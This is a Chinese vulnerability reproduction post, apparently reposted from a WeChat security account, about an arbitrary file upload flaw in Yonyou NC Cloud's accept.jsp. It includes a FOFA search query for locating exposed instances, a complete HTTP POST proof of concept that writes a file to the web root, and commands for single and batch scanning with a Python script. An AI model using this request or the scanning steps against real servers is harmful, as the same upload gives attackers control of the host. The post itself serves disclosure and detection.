2023年11月9日09:15:59评论32 views字数 877阅读2分55秒阅读模式

一、漏洞描述

NC Cloud是用友推出的大型企业数字化平台。用友网络科技股份有限公司NC Cloud存在任意文件上传漏洞，攻击者可利用该漏洞获取服务器控制权。

用友NC Cloud accept.jsp任意文件上传漏洞

二、网络空间搜索引擎查询

fofa查询

icon_hash="1085941792"

用友NC Cloud accept.jsp任意文件上传漏洞

三、漏洞复现

POC

POST /aim/equipmap/accept.jsp HTTP/1.1Host: ip:portUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36Accept-Encoding: gzip, deflateAccept: */*Connection: closeContent-Length: 324Content-Type: multipart/form-data; boundary=ac1485f11aa5441defff4ab45b7fb177

--ac1485f11aa5441defff4ab45b7fb177Content-Disposition: form-data; name="upload"; filename="check.txt"Content-Type: text/plain

There is a vulnerability in this website--ac1485f11aa5441defff4ab45b7fb177Content-Disposition: form-data; name="fname"

webappsnc_webcheck.txt--ac1485f11aa5441defff4ab45b7fb177--

上传成功，返回如下：

用友NC Cloud accept.jsp任意文件上传漏洞

访问

http://ip:port/check.txt

查看上传内容

用友NC Cloud accept.jsp任意文件上传漏洞

四、漏洞检测

单个检测

python AcceptUpload.py -u url

用友NC Cloud accept.jsp任意文件上传漏洞

批量检测

python AcceptUpload.py -f filename

用友NC Cloud accept.jsp任意文件上传漏洞

原文始发于微信公众号（网络安全透视镜）：用友NC Cloud accept.jsp任意文件上传漏洞

我的微信
微信扫一扫

我的微信公众号
微信扫一扫

用友NC Cloud accept.jsp任意文件上传漏洞

一、漏洞描述

二、网络空间搜索引擎查询

三、漏洞复现

四、漏洞检测

【已复现】关于新的Struts2漏洞，你应该知道的

【漏洞情报 | 新】云安宝-云匣子Fastjson命令执行

[1day]用友NC存在任意文件读取删除漏洞[附批量POC]

CVE-2023-50164：Apache Struts 代码执行漏洞通告

漏洞预警 | PyDrive2 YAML反序列化漏洞

漏洞预警 | 百卓网络Smart S20文件上传漏洞

【已复现】Apache Struts文件上传组件存在目录遍历漏洞(CVE-2023-50164)

【高危漏洞】ezEip系统存在命令执行漏洞

漏洞复现|好视通视频会议存在任意文件读取漏洞 [附POC]

云时空社会化商业ERP系统gpy任意文件上传漏洞RCE（附POC）

发表评论

在线咨询

微信